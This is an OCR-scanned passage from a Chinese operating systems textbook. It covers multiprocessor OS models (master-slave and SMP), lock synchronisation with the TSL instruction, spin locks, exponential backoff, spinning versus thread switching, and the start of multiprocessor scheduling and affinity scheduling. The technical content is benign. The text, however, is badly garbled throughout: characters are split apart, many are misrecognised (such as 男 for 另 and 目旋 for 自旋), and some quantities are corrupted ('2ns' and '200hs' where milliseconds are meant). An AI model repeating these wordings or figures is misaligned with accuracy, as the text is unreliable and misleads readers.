时 间 ， 还 可 以 在 CPU 1 上 运行 用 户 进程 。 这 种 模型 称 为 主 从 模型 
(master-slave) ， 因 为 CPU 1 是 主 CPU， 而 其 他 的 都 是 从 属 CPU。 


CPU2 CPU 3 CPU 4 存储 器 IO 





图 8-8 主 从 多 处 理 机 模型 


主 从 模型 解决 了 在 第 一 种 模型 中 的 多 数 问 题 。 有 单一 的 数据 结构 


《如 一 个 链表 或 者 一 组 优先 级 链表 ) 用 来 记录 就 绪 进 程 。 当 某 个 CPU 空 
闲 下 来 时 ， 它 向 CPU 1 上 的 操作 系统 请 求 一 个 进程 运行 ， 并 被 分 配 一 个 
进程 。 这 样 ， 就 不 会 出 现 一 个 CPU 空闲 而 另 一 个 过 载 的 情形 。 类 似 地 ， 
可 在 所 有 的 进程 中 动态 地 分 配 页 面 ， 而 且 只 有 一 个 缓冲 区 高 速 缓存 ， 所 
以 决 不 会 出 现 个 一 致 的 情形 。 





这 个 模型 的 问题 是 ， 如 果 有 很 多 的 CPU， 主 CPU 会 变 成 一 个 瓶颈 。 
毕竟 ， 它 要 处 理 来 自 所 有 CPU 的 系统 调用 。 如 果 全 部 时 间 的 10% 用 来 处 
理 系统 调用 ， 那 么 10 个 CPU 就 会 使 主 CPU 饱 和 ， 而 20 个 CPU 就 会 使 主 
CPU 彻底 过 载 。 可 见 ， 这 个 模型 虽然 简单 ， 而 且 对 小 型 多 处 理 机 是 可 行 
的 ， 但 不 能 用 于 大 型 多 处 理 机 。 


3. 对 称 多 处 理 机 


我 们 的 第 三 种 模型 ， 即 对 称 多 处 理 机 〈Symmetric MultiProcessor， 
SMP) ， 消 除了 上 述 的 不 对 称 性 。 在 存储 器 中 有 操作 系统 的 一 个 副本 ， 
但 任何 CPU 都 可 以 运行 它 。 在 有 系统 调用 时 ， 进 行 系统 调用 的 CPU 陷入 
内 核 并 处 理 系统 调用 。 图 8-9 是 对 SMP 模 式 的 说 明 。 


CPU 1 CPU 2 CPU 3 CPU 4 -存储 器 IO 
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图 8-9 SMP 多 处 理 机 模型 


这 个 模型 动态 地 平衡 进程 和 存储 器 ， 因 为 它 只 有 一 套 操作 系统 数据 
表 。 它 还 消除 了 主 CPU 的 瓶颈 ， 因 为 不 存在 主 CPU; 但 是 这 个 模型 也 带 
来 了 自生 的 问题 。 特 别 是 ， 当 两 个 或 更 多 的 CPU 同时 运行 操作 系统 代码 
时 ， 就 会 出 现 灾难 。 想 象 有 两 个 CPU 同时 选择 相同 的 进程 运行 或 请 求 同 
一 个 空闲 存储 器 页 面 。 处 理 这 些 问题 的 最 简单 方法 是 在 操作 系统 中 使 用 
互 斥 信号 量 〈 锁 ) ， 使 整个 系统 成 为 一 个 大 临界 区 。 当 一 个 CPU 要 运行 
操作 系统 时 ， 它 必须 首先 获得 互 斥 信号 量 。 如 果 互 斥 信号 量 被 锁 住 ， 就 
得 等 待 。 按 照 这 种 方式 ， 任 何 CPU 都 可 以 运行 操作 系统 ， 但 在 任 一 时 刻 
只 有 一 个 CPU 可 运行 操作 系统 。 

















这 个 模型 是 可 以 工作 的 ， 但 是 它 几 乎 同 主 从 模式 一 样 糟糕 。 同 样 假 
设 ， 如 果 所 有 时 间 的 10% 论 费 在 操作 系统 内 部 。 那 么 在 有 20 个 CPU 时 ， 
会 出 现 等 待 进 入 的 CPU 长 队 。 幸 运 的 是 ， 比 较 容 易 进 行 改进 。 操 作 系统 
中 的 很 多 部 分 是 彼此 独立 的 。 例 如 ， 在 一 个 CPU 运行 调度 程序 时 ， 另 一 





个 CPU 则 处 理 文件 系统 的 调用 ， 而 第 三 个 在 处 理 一 个 缺 页 异常 ， 这 种 运 


行 方式 是 没有 问题 的 。 





这 一 事实 使 得 把 操作 系统 分 割 成 互 不 影响 的 临界 区 。 每 个 临界 区 由 
其 互 斥 信号 量 保护 ， 所 以 一 次 只 有 一 个 CPU 可 执行 它 。 采 用 这 种 方式 ， 
可 以 实现 更 多 的 并 行 操作 。 而 茶 些 表格 ， 如 进程 表 ， 可 能 恰巧 被 多 个 临 
界 区 使 用 。 例 如 ， 在 调度 时 需要 进程 表 ， 在 系统 fork 调 用 和 信和 号 处 理 时 
也 者 需要 进程 表 。 多 临界 区 使 用 的 每 个 表格 ， 都 需要 有 各 目的 互 斥 信和 号 
量 。 通 过 这 种 方式 ， 可 以 做 到 每 个 临界 区 在 任 一 个 时 刻 只 被 一 个 CPU 执 
行 ， 而 且 在 任 一 个 时 刻 每 个 临界 表 (critical table) 也 只 被 一 个 CPU 访 














大 多 数 的 现代 多 处 理 机 都 采用 这 种 安排 。 为 这 类 机 器 编写 操作 系统 
的 困难 ， 不 在 于 其 实际 的 代码 与 普通 的 操作 系统 有 多 大 的 不 同 ， 而 在 于 
如 何 将 其 划分 为 可 以 由 不 同 的 CPU 并 行 执行 的 临界 区 而 互 不 干扰 ， 即 使 
以 细小 的 、 间 接 的 方式 。 另 外 ， 对 于 被 两 个 或 多 个 临界 区 使 用 的 表 必 须 
通过 互 斥 信号 量 分 别 加 以 保护 ， 而 且 使 用 这 些 表 的 代码 必须 正确 地 运用 
互 斥 信号 





mh 


更 进一步 ， 必 须 格外 小 心地 避免 死 锁 。 如 果 两 个 临界 区 都 需要 表 A 
和 表 B， 其 中 一 个 首先 申请 A， 故 一 个 首先 申请 B， 那 么 述 早 会 发 生死 
锁 ， 而 且 没 有 人 知道 为 什么 会 发 生死 锁 。 理 论 上 ， 上 所 有 的 表 可 以 被 赋予 
整数 值 ， 而 且 所 有 的 临界 区 都 应 该 以 升序 的 方式 获得 表 。 这 一 策略 避免 




















了 死 锁 ， 但 是 需要 程序 员 非 常 仔细 地 考虑 每 个 临界 区 需要 哪个 表 ， 以 便 
按照 正确 的 次 序 安 排 请 求 。 





由 于 代码 是 随 独 时 间 演 化 的 ， 所 以 也 许 有 个 临界 区 需要 一 张 过 去 不 
要 的 新 表 。 如 果 程序 员 是 新 接手 工作 的 ， 他 不 了 解 系统 的 整个 逻辑 ， 
那么 可 能 只 是 在 他 需要 的 时 候 获 得 表 ， 并 且 在 不 需要 时 释放 挥 。 尺 管 这 
看 起 来 是 合理 的 ， 但 是 可 能 会 叶 人 致死 锁 ， 即 用 户 会 觉察 到 系统 被 凝固 住 
了 。 要 做 正确 并 不 容易 ， 而 且 要 在 程序 员 不 断 更 换 的 数 年 时 间 之 内 始终 
保持 正确 性 太 困 难 了 。 














8.1.3 多 处 理 机 同步 


在 多 处 理 机 中 CPU 经 常 需要 同步 。 这 里 刚刚 看 到 了 内 核 临 界 区 和 表 
被 互 斥 信号 量 保护 的 情形 。 现 在 让 我 们 仔细 看 看 在 多 处 理 机 中 这 种 同步 
古 如 何 工 作 的 。 正 如 我 们 将 看 到 的 ， 它 远 不 是 那么 无 足 轻 重 。 











开始 讨论 之 前 ， 还 需要 引入 同步 原 语 。 如 果 一 个 进程 在 单 处 理 机 
〈 仅 合 一 个 CPU) 中 需要 访问 一 些 内 核 临界 表 的 系统 调用 ， 那 么 和 内核 代 
码 在 接触 该 表 之 前 可 以 先 禁止 中 断 。 然 后 它 继 续 工 作 ， 在 相关 工作 完成 
之 前 ， 不 会 有 任何 其 他 的 进程 溜 进来 访问 该 表 。 在 多 处 理 机 中 ， 蔡 止 中 
断 的 操作 只 影响 到 完成 禁止 中 断 操作 的 这 个 CPPU， 其 他 的 CPU 继 续 运 行 
并 且 可 以 访问 临界 表 。 因 此 ， 必 须 采 用 一 种 合适 的 互 斥 信号 量 协议 ， 而 
且 所 有 的 CPU 都 遭 守 该 协议 以 保证 互 斥 工作 的 进行 。 











任何 实用 的 互 斥 信号 量 协议 的 核心 都 是 一 条 特殊 指令 ， 该 指令 允许 
检测 一 个 存储 器 字 并 以 一 种 不 可 见 的 操作 设置 。 我 们 来 看 看 在 图 2-22 中 
使 用 的 指令 TSL (Test and Set Lock) 是 如 何 实现 临界 区 的 。 正 如 我 们 先 
前 讨论 的 ， 这 条 指令 做 的 是 ， 读 出 一 个 存储 器 字 并 把 它 存储 在 一 个 寄存 
器 中 。 同 时 ， 它 对 该 存储 器 字 写 入 一 个 1 (或 某 些 非 零 值 ) 。 当 然 ， 这 
需要 两 个 总 线 周 期 来 完成 存储 器 的 读 写 。 在 单 处 理 机 中 ， 只 要 该 指令 不 
被 中 途中 断 ，TSL 指 令 就 始终 照常 工作 。 


现在 考虑 在 一 个 多 处 理 机 中 发 生 的 情况 。 在 图 8-10 中 我 们 看 到 了 最 
坏 情 况 的 时 序 ， 其 中 存储 器 字 1000， 被 用 作 一 个 初始 化 为 0 的 锁 。 第 1 
步 ，CPU 1 读 出 该 字 得 到 一 个 0。 第 2 步 ， 在 CPU 1 有 机 会 把 该 字 写 为 1 之 


前 ，CPU 2 进入 ， 并 且 也 读 出 该 字 为 0。 第 3 步 ，CPU 1 把 1 写 入 该 字 。 第 
4 步 ，CPU 2 也 把 1 写 入 该 字 。 两 个 CPU 都 由 TSL 指 令 得 到 0， 所 以 两 者 都 





对 临界 区 进行 访问 ， 并 且 互 斥 失败 。 


CPU 1 字 1000 被 
初始 化 为 0 







1.CPU 1 读 一 个 0 


3. CPU 1 写 一 个 1 4. CPU 2 写 一 个 1| a 


图 810 如 果 不 能 锁 住 总 线 ，TSL 指 令 会 失效 。 这 里 的 四 步 解释 了 失 
效 情况 


为 了 阻止 这 种 情况 的 发 生 ，TSL 指 令 必须 首先 锁 住 总 线 ， 阻 止 其 他 
的 CPU 访 问 它 ， 然 后 进行 存储 器 的 读 写 访问 ， 再 解锁 总 线 。 对 总 线 加 锁 
的 典型 做 法 是 ， 允 使 用 通常 的 总 线 协 议 请 求 总 线 ， 并 申明 《设置 一 个 逻 
辑 1) 已 拥有 茶 些 特定 的 总 线 线路 ， 直 到 两 个 周期 全 部 完成 。 只 要 始终 
保持 拥有 这 一 特定 的 总 线 线路 ， 那 么 其 他 CPU 就 不 会 得 到 总 线 的 访问 
权 。 这 个 指令 只 有 在 拥有 必要 的 线路 和 和 使 用 它们 的 (硬件) 协议 上 才 


能 实现 。 现 代 总 线 有 这 些 功 能 ， 但 是 早期 的 一 些 总 线 不 具备 ， 它 们 不 能 
正确 地 实现 TSL 指 令 。 这 就 是 Peterson 协 议 〈 完 全 用 软件 实现 同步 ) 会 
产生 的 原因 (Peterson, 1981) 。 


如 采 正 确 地 实现 和 使 用 TSL， 筷 能 够 保证 互 太 机制 正常 工作 。 但 是 
这 种 互 斥 方法 使 用 了 自 旋 锁 (spin lock) ， 因 为 请 求 的 CPU 只 是 在 原 地 
尽 可 能 快 地 对 锁 进行 循环 测试 。 这 样 做 不 仅 完 全 浪费 了 提出 请 求 的 各 个 
CPU 的 时 间 ， 而 且 还 给 总 线 或 存储 器 增加 了 大 量 的 负载 ， 严 重地 降低 了 
所 有 其 他 CPU 从 事 正 常 工 作 的 速度 。 





乍 一 看 ， 高 速 绥 存 的 实现 也 许 能 够 消除 总 线 竞 争 的 问题 ， 但 事实 并 
非 如 此 。 理 论 上 ， 只 要 提出 请 求 的 CPU 已 经 读 取 了 锁 字 (lock word) , 
它 就 可 在 其 高 速 缓存 中 得 到 一 个 副本 。 只 要 没有 其 他 CPU 试图 使 用 该 
锁 ， 提 出 请 求 的 CPU 就 能 够 用 完 其 高 速 缓存 。 当 拥有 锁 的 CPU 写 入 一 个 
1 到 高 速 缓存 并 释放 它 时 ， 高 速 缓存 协议 会 自动 地 将 它 在 远程 高 速 缓存 
中 的 所 有 副本 失效 ， 要 求 再 次 读 取 正 确 的 值 。 











问题 是 ， 高 速 缓存 操作 是 在 32 或 64 字 节 的 块 中 进行 的 。 通 常 ， 拥 有 
锁 的 CPU 也 需要 这 个 锁 周围 的 字 。 由 于 TSL 指 令 是 一 个 写 指令 (因为 它 
修改 了 锁 ) ， 所 以 它 需 要 互 太 地 访问 含有 锁 的 高 速 缓存 块 。 这 样 ， 每 一 
个 TSL 都 使 锁 持 有 者 的 高 速 缓存 中 的 块 失效 ， 并 且 为 请 求 的 CPU 取 一 个 
私有 的 、 惟 一 的 副本 。 只 要 锁 拥 有 者 访问 到 该 锁 的 邻接 字 ， 该 高 速 缓存 
块 就 被 送 进 其 机 器 。 这 样 一 来 ， 整 个 包含 锁 的 高 速 缓存 块 就 会 不 断 地 在 








锁 的 拥有 者 和 锁 的 请 求 者 之 间 来 回 穿梭 ， 导 致 了 比 单个 读 取 一 个 锁 字 更 
大 的 总 线 流量 。 


如 果 能 消除 在 请 求 一 侧 的 所 有 由 TSL 引 起 的 写 操 作 ， 我 们 就 可 以 明 
显 地 减少 这 种 开销 。 使 提出 请 求 的 CPU 首先 进行 一 个 纯 读 操作 来 观察 锁 
是 否 空间 ， 就 可 以 实现 这 个 目标 。 只 有 在 锁 看 来 是 空间 时 ，TSL 才 真正 
去 获取 它 。 这 种 小 小 变化 的 结果 是 ， 大 多 数 的 行为 变 成 读 而 不 是 写 。 如 
果 拥 有 锁 的 CPU 只 是 在 同一 个 高 速 缓存 块 中 读 取 各 种 变量 ， 那 么 它们 每 
个 都 可 以 以 共享 只 读 方式 拥有 一 个 高 速 缓存 块 的 副本 ， 这 就 消除 了 所 有 
的 高 速 缓存 块 传送 。 当 锁 最 终 被 释放 时 ， 锁 的 所 有 者 进行 写 操作 ， 这 需 
要 排 它 访问 ， 也 就 使 远程 高 速 缓存 中 的 所 有 其 他 副本 失效 。 在 提出 请 求 
的 CPU 的 下 一 个 读 请 求 中 ， 高 速 缓存 块 会 被 重新 装载 。 注 意 ， 如 果 两 个 
或 更 多 的 CPU 竞争 同一 个 锁 ， 那 么 有 可 能 出 现 这 样 的 情况 ， 两 者 同时 看 
到 锁 是 空闲 的 ， 于 是 同时 用 TSL 指 令 去 获得 它 。 只 有 其 中 的 一 个 会 成 
功 ， 所 以 这 里 没有 竞争 条 件 ， 因 为 真正 的 获取 是 由 TSL 指 令 进行 的 ， 而 
且 这 条 指令 是 原子 性 的 。 即 使 看 到 了 锁 空间 ， 然 后 立即 用 TSL 指 令 试图 
获得 它 ， 也 不 能 保证 真正 得 到 它 。 其 他 CPU 可 能 会 取胜 ， 不 过 对 于 该 算 
法 的 正确 性 来 说 ， 谁 得 到 了 锁 并 不 重要 。 纯 读 出 操作 的 成 功 只 是 意味 着 
这 可 能 是 一 个 获得 锁 的 好 时 机 ， 但 并 不 能 确保 能 成 功 地 得 到 锁 。 

















男 一 个 减少 总 线 流量 的 方式 是 使 用 著名 的 以 太 网 二 进 制 指数 补偿 算 
法 (binary exponential backoff algorithm) (Anderson, 1990) 。 不 是 采 


用 连续 轮 询 ， 参 考 图 2-22， 而 是 把 一 个 延迟 循环 插入 轮 询 之 间 。 初 始 的 

是 一 条 指令 。 如 果 锁 仍然 忙 ， 延 迟 被 加 倍 成 为 两 条 指令 ， 然 后 ， 四 
条 指令 ， 如 此 这 样 进 行 ， 直 到 茶 个 最 大 值 。 当 锁 释 放 时 ， 较 低 的 最 大 值 
会 产生 快速 的 啊 应 。 但 是 会 浪费 较 多 的 总 线 周 期 在 高 速 缓存 的 由 艇 上 。 
而 较 高 的 最 大 值 可 减少 高 速 缓存 的 颠 稻 ， 但 是 其 代价 是 不 会 注意 到 锁 如 
此 迅速 地 成 为 空间。 二 进 制 指数 补偿 算法 无 论 在 有 或 无 TSL 指 令 前 的 纯 
读 的 情况 下 都 适用 。 























一 个 更 好 的 思想 是 ， 让 每 个 打算 获得 互 斥 信号 量 的 CPU 都 拥有 各 自 
用 于 测试 的 私有 锁 变量 ， 如 图 8-11 所 示 〈Mellor-Crummey 和 Scott， 
1991) 。 有 关 的 变量 应 该 存放 在 未 使 用 的 高 速 缓存 块 中 以 避免 冲突 。 对 
这 种 算法 的 描述 如 下 : 给 一 个 未 能 获得 锁 的 CPU 分 配 一 个 锁 变量 并 且 把 
它 附 在 等 待 该 锁 的 CPU 链表 的 末端 。 在 当前 锁 的 持 有 者 退出 临界 区 时 ， 
它 释 放 链 表 中 的 首 个 CPU 正在 测试 的 私有 锁 〈 在 自己 的 高 速 缓存 中 ) 。 
然后 该 CPU 进入 临界 区 。 操 作 完成 之 后 ， 该 CPU 释放 锁 。 其 后 继 者 接着 
使 用 ， 以 此 类 推 。 尽 管 这 个 协议 有 些 复杂 (为 了 避免 两 个 CPU 同 时 把 它 
们 自己 加 在 链表 的 末端 ， 但 它 能 够 有 效 工作 ， 而 且 消 除了 饥饿 问题 。 
具体 细节 ， 读 者 可 以 参考 有 关 论 文 。 
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到 目前 为 止 ， 不 论 是 连续 轮 询 方式 、 间 鞭 轮 询 方式 ， 还 是 把 自己 附 
在 进行 等 候 CPU 链 表 中 的 方式 ， 我 们 都 假定 需要 加 锁 的 互 斥 信号 量 的 
CPU 只 是 保持 等 待 。 有 时 对 于 提出 请 求 的 CPU 而 言 ， 只 有 等 待 ， 不 存在 
其 他 蔡 代 的 办 法 。 例 如 ， 假 设 一 些 CPU 是 空闲 的 ， 需 要 访问 共享 的 就 绪 
链表 (ready list) 以 便 选 择 一 个 进程 运行 。 如 果 就 绪 链表 被 锁 住 了 ， 那 
么 CPU 就 不 能 够 只 是 决定 暂停 其 正在 进行 的 工作 ， 而 去 运行 另 一 个 进 
程 ， 因 为 这 样 做 需要 访问 就 绪 链表 。CPU 必 须 保 持 等 待 直到 能 够 访问 该 
就 绪 链 表 。 











然而 ， 在 男 外 一 些 情形 中 ， 却 存在 着 别 的 选择 。 例 如 ， 如 果 在 一 个 





CPU 中 的 东 些 线程 需要 访问 文件 系统 缓冲 区 高 速 缓存 ， 而 该 文件 系统 组 
冲 区 高 速 缓存 正好 锁 住 了 ， 那 么 CPU 可 以 决定 切换 至 另外 一 个 线程 而 不 
是 等 待 。 有 关 是 进行 目 旋 还 是 进行 线程 切换 的 问题 则 是 许多 研究 谍 题 的 
内 容 ， 下 面 会 讨论 其 中 的 一 部 分 。 请 注意 ， 这 类 问题 在 单 处 理 机 中 是 不 
存在 的 ， 因 为 没有 另 一 个 CPU 释放 锁 ， 那 么 目 旋 就 没有 任何 意义 。 如 果 
一 个 线程 试图 取得 锁 并 且 失 败 ， 那 么 它 总 是 被 阻 蹇 ， 这 样 锁 的 所 有 者 有 
机 会 运行 和 释放 该 锁 。 














假设 目 旋 和 进行 线程 切换 都 是 可 行 的 选择 ， 则 可 进行 如 下 的 权衡 。 
目 旋 直接 溪 费 了 CPU 周期 。 重 复 地 测试 锁 并 不 是 高 效 的 工作 。 不 过 ， 切 
换 也 当 费 了 CPU 周期 ， 因 为 必须 保存 当前 线程 的 状态 ， 必 须 获 得 保护 束 
绪 链 表 的 锁 ， 还 必须 选择 一 个 线程 ， 必 须 装 入 其 状态 ， 并 且 使 其 开始 运 
行 。 更 进一步 来 说 ， 该 CPU 高 速 缓存 还 将 包含 所 有 不 合适 的 高 速 缓存 
块 ， 因 此 在 线程 开始 运行 的 时 候 会 发 生 很 多 代价 昂贵 的 高 速 缓存 未 命 
中 。TLB 的 失效 也 是 可 能 的 。 最 后 ， 会 发 生 返 回 至 原来 线程 的 切换 ， 随 
之 而 来 的 是 更 多 的 高 速 缓存 未 命中 。 花 费 在 这 两 个 线程 间 来 回 切换 和 所 
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前 线程 切换 需要 lms， 稍 后 切换 返回 还 需 1ms， 那 么 在 互 斥 信号 量 上 和 目 
旋 则 更 为 有 效 。 夯 一 方面 ， 如 于 互 斥 信号 量 的 平均 保持 时 间 是 10ms， 那 
就 值得 候 受 线程 切换 的 麻烦 。 问 题 在 于 ， 临 界 区 在 这 个 期 间 会 发 生 相 当 











大 的 变化 ， 所 以 ， 哪 一 种 方法 更 好 些 呢 ? 





有 一 种 设计 是 总 是 进行 自 旋 。 第 二 种 设计 方案 则 总 是 进行 切换 。 而 
第 三 种 设计 方案 是 每 当 遇 到 一 个 锁 住 的 互 斥 信号 量 时 ， 就 单独 做 出 诀 
定 。 在 必须 做 出 决定 的 时 刻 ， 并 不 知道 自 旋 和 切换 哪 一 种 方案 更 好 ， 但 
是 对 于 任何 给 定 的 系统 ， 有 可 能 对 其 所 有 的 有 关 活 动 进行 跟踪 ， 并 且 随 
后 进行 离线 分 析 。 然 后 就 可 以 确定 哪个 决定 最 好 及 在 最 好 情形 下 所 浪费 
的 时 间 。 这 种 事后 算法 (hindsight algorithm ) 成 为 对 可 行 算 法 进行 测量 
的 基准 评测 标准 。 








己 有 研究 人 员 对 上 述 这 一 问题 进行 了 研究 〈Karlin 等 人 ，1989; 
Karlin“ A, 1991; Ousterhout, 1982) 。 多 数 的 研究 工作 使 用 了 这 样 一 
个 模型 : 一 个 未 能 获得 互 斥 信号 量 的 线程 自 旋 一 段 时 间 。 如 果 时 间 超 过 
某 个 闵 值 ， 则 进行 切换 。 在 某 些 情形 下 ， 该 阐 值 是 一 个 定 值 ， 典 型 值 是 
切换 至 男 一 个 线程 再 切换 回来 的 开销 。 在 男 一 些 情形 下 ， 该 闵 值 是 动态 
变化 的 ， 它 取 雇 于 所 观察 到 的 等 待 互 斥 信号 量 的 历史 信息 。 











在 系统 跟踪 若干 最 新 的 自 旋 时 间 并 且 假 定 当 前 的 情形 可 能 会 同 先前 
的 情形 类 似 时 ， 就 可 以 得 到 最 好 的 结果 。 例 如 ， 假 定 还 是 lms 切 换 时 
间 ， 线 程 自 旋 时 间 最 长 为 2ns， 但 是 要 观察 实际 上 自 旋 了 多 长 时 间 。 如 
果 线 程 未 能 获取 锁 ， 并 且 发 现在 之 前 的 三 轮 中 ， 平 均等 待 时 间 为 
200hs， 那 么 ， 在 切换 之 前 就 应 该 先 自 旋 2ms。 但 是 ， 如 果 发 现在 先前 的 
每 次 尝试 中 ， 线 程 都 自 旋 了 整整 2ms， 则 应 该 立即 切换 而 不 再 自 旋 。 更 











多 的 细节 可 以 在 (Karlin 等 人 ，1991) 中 找到 。 


8.1.4 多 处 理 机 调度 





在 探讨 多 处 理 机 调度 之 前 ， 需 要 确定 调度 的 对 象 是 什么 。 过 去 ， 当 
所 有 进程 都 是 单个 线程 的 时 候 ， 调 度 的 单位 是 进程 ， 因 为 没有 其 他 什么 
可 以 调度 的 。 所 有 的 现代 操作 系统 都 支持 多 线程 进程 ， 这 让 调度 变 得 更 
加 复杂 。 


线程 是 内 核 线程 还 是 用 户 线程 至 关 重 要 。 如 果 线 程 是 由 用 户 空间 库 
维护 的 ， 而 对 内 核 不 可 见 ， 那 么 调度 一 如 既往 的 基于 单个 进程 。 如 果 内 
核 并 不 知道 线程 的 存在 ， 它 就 不 能 调度 线程 。 


对 内 核 线程 来 说 ， 情 况 有 所 不 同 。 在 这 种 情况 下 所 有 线程 均 是 内 核 
可 见 的 ， 内 核 可 以 选择 一 个 进程 的 任 一 线程 。 在 这 样 的 系统 中 ， 发 展 趋 
势 是 内 核 选择 线程 作为 调度 单位 ， 线 程 从 属 的 那个 进程 对 于 调度 算法 只 
有 很 少 的 (乃至 没有 〉 影响 。 下 面 我 们 将 探讨 线程 调度 ， 当 然 ， 对 于 一 
个 单线 程 进程 〈single-threaded process) 系统 或 者 用 户 空间 线程 ， 调 度 
单位 依然 是 进程 。 


进程 和 线程 的 选择 并 不 是 调度 中 的 惟一 问题 。 在 单 处 理 机 中 ， 调 度 
是 一 维 的 。 惟 一 必须 《不断 重复 地 ) 回答 的 问题 是 :“ 接 下 来 运行 的 线 
程 应 该 是 哪 一 个 ? ?而 在 多 处 理 机 中 ， 调 度 是 二 维 的。 调度 程序 必须 诀 
定 哪 一 个 进程 运行 以 及 在 哪 一 个 CPU 上 运行 。 这 个 在 多 处 理 机 中 增加 的 








维 数 大 大 增加 了 调度 的 复杂 性 。 


另 一 个 造成 复杂 性 的 因 系 是 ， 在 有 些 系统 中 所 有 的 线程 是 不 相关 
的 ， 而 在 男 外 一 些 系 统 中 它们 是 成 组 的 ， 同 属于 同一 个 应 用 并 且 协 同 工 
作 。 前 一 种 情形 的 例子 是 分 时 系统 ， 其 中 独立 的 用 户 运 行 相互 独立 的 进 
程 。 这 些 不 同 进程 的 线程 之 间 没 有 关系 ， 因 此 其 中 的 每 一 个 都 可 以 独立 
调度 而 不 用 考虑 其 他 的 线程 。 


后 一 种 情形 的 例子 通常 发 生 在 程序 开发 环境 中 。 大 型 系统 中 通 冲 有 
一 些 供 实际 代码 使 用 的 包含 宏 、 类 型 定义 以 及 变量 声明 等 内 容 的 头 文 
件 。 当 一 个 头 文 件 改变 时 ， 所 有 包含 它 的 代码 文件 必须 被 重新 编译 。 通 
常 make 程 序 用 于 管理 开发 工作 。 调 用 make 程 序 时 ， 在 考虑 了 头 文 件 或 
代码 文件 的 修改 之 后 ， 它 仅 编 译 那 些 必须 重新 编译 的 代码 文件 。 仍 然 有 
效 的 目标 文件 不 再 重新 生成 。 


make 的 原始 版 本 是 顺序 工作 的 ， 不 过 为 多 处 理 机 设计 的 新 版 本 可 以 
一 次 启动 所 有 的 编译 。 如 果 需 要 10 个 编译 ， 那 么 迅速 对 9 个 进行 调度 而 
让 最 后 一 个 在 很 长 的 时 间 之 后 才 进 行 的 做 法 没有 多 大 意义 ， 因 为 直到 最 
后 一 个 线程 完毕 之 后 用 户 才 感觉 到 工作 完成 了 。 在 这 种 情况 下 ， 将 进行 
编译 的 线程 看 作 一 组 ， 并 在 对 其 调度 时 考虑 到 这 一 点 是 有 意义 的 。 








让 我 们 首先 讨论 调度 独立 线程 的 情况 。 稍 后 ， 我 们 将 考虑 如 何 调度 





相关 的 线程 。 处 理 独立 线程 的 最 简单 算法 是 ， 为 就 绪 线程 维护 一 个 系统 
级 的 数据 结构 ， 它 可 能 只 是 一 个 链表 ， 但 更 多 的 情况 下 可 能 是 对 应 不 同 
优先 级 一 个 链表 集合 ， 如 图 8-12a 所 示 。 这 里 16 个 CPU 正在 忙碌 ， 有 不 
同 优先 级 的 14 个 线程 在 等 竺 运行。 第 一 个 将 要 完成 其 当前 工作 (或 其 线 
程 将 被 阻塞 ) 的 CPU 是 CPU 4， 然 后 CPU 4 锁 住 调度 队列 (scheduling 

queue) 并 选择 优先 级 最 高 的 线程 A， 如 图 8-12b 所 示 。 接 着 ，CPU 12 空 
闲 并 选择 线程 B， 参 见 图 8-12c。 只 要 线程 完全 无 关 ， 以 这 种 方式 调度 是 
明智 的 选择 并 且 其 很 容易 高 效 地 实现 。 
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图 8-12 使 用 单一 数据 结构 调度 一 个 多 处 理 机 


由 所 有 CPU 使 用 的 单个 调度 数据 结构 分 时 共享 这 些 CPU， 正 如 它们 
在 一 个 单 处 理 机 系统 中 那样 。 它 还 文 持 目 动 负载 平衡 ， 因 为 决 不 会 出 现 
一 个 CPU 空闲 而 其 他 CPU 过 载 的 情况 。 不 过 这 一 方法 有 两 个 缺点 ， 一 个 
古 随 着 CPU 数 量 增加 所 引起 的 对 调度 数据 结构 的 潜在 苋 争 ， 二 是 当 线 程 











由 于 IO 阻塞 时 所 引起 上 下 文 切换 的 开销 Coverhead) 。 


在 线程 的 时 间 片 用 完 时 ， 也 可 能 发 生 上 下 文 切 换 。 在 多 处 理 机 中 它 
有 一 些 在 单 处 理 机 中 不 存在 的 属性 。 假 设 某 个 线程 在 其 时 间 片 用 完 时 持 
有 一 把 自 旋 锁 。 在 该 线程 被 再 次 调度 并 且 释 放 该 锁 之 前 ， 其 他 等 待 该 自 
旋 锁 的 CPU 只 是 把 时 间 浪 费 在 自 旋 上 。 在 单 处 理 机 中 ， 极 少 采 用 自 旋 
锁 ， 因 此 ， 如 果 持 有 互 斥 信号 量 的 一 个 线程 被 挂 起 ， 而 另 一 个 线程 启动 
并 试图 获取 该 互 斥 信号 量 ， 则 该 线程 会 立即 被 阻塞 ， 这 样 只 浪费 了 少量 
时 间 。 








为 了 避免 这 种 寞 第 情况 ， 一 些 系统 采用 智能 调度 (smart 
scheduling) 的 方法 ， 其 中 ， 获 得 了 目 旋 锁 的 线程 设置 一 个 进程 范围 内 
的 标志 以 表示 它 目 前 拥有 了 一 个 自 旋 锁 〈Zahorjan 等 人 ，1991) . 4 
释放 该 自 旋 锁 时 ， 就 清除 这 个 标志 。 这 样 调度 程序 就 不 会 停止 持 有 自 旋 
锁 的 线程 ， 相 反 ， 调 度 程序 会 给 予 稍微 多 一 些 的 时 间 让 该 线程 完成 临界 
区 内 的 工作 并 释放 上 自 旋 锁 。 








调度 中 的 男 一 个 主要 问题 是 ， 当 所 有 CPU 平 等 时 ， 某 些 CPU 更 平 
等 。 特 别 是 ， 当 线程 A 已 经 在 CPU k 上 运行 了 很 长 一 段 时 间 时 ，CPU k 的 
高 速 缓存 装 满 了 A 的 块 。 知 A 很 快 重 新 开始 运行 ， 那 么 如 果 它 在 CPU kE 
运行 性 能 可 能 会 更 好 一 些 ， 因 为 k 的 高 速 缓存 也 许 还 存 有 A 的 一 些 块 。 
预 装 高 速 绥 存 块 将 提高 高 速 缓存 的 命中 率 ， 从 而 提高 了 线程 的 速度 。 另 
外 ，TLB 也 可 能 含有 正确 的 页 面 ， 从 而 减少 了 TLB 失 效 。 





有 些 多 处理 机 考虑 了 这 一 因素 ， 并 使 用 了 所 谓 杀 和 调度 (affinity 
scheduling) (VaswanifllZahorjan, 1991) 。 其 基本 思想 是 ， 尺 量 使 一 
个 线程 在 它 前 一 次 运行 过 的 同一 个 CPU 上 运行 。 创 建 这 种 亲和力 
Gaffinity) 的 一 种 途径 是 采用 一 种 两 级 调度 算法 (two-level scheduling 
algorithm) 。 在 一 个 线程 创建 时 ， 它 被 分 给 一 个 CPU， 例 如 ， 可 以 基于 
哪 一 个 CPU 在 此 刻 有 最 小 的 负载 。 这 种 把 线程 分 给 CPU 的 工作 在 算法 的 
顶层 进行 ， 其 结果 是 每 个 CPU 获得 了 自己 的 线程 集 。 


线程 的 实际 调度 工作 在 算法 的 底层 进行 。 它 由 每 个 CPU 使 用 优先 级 
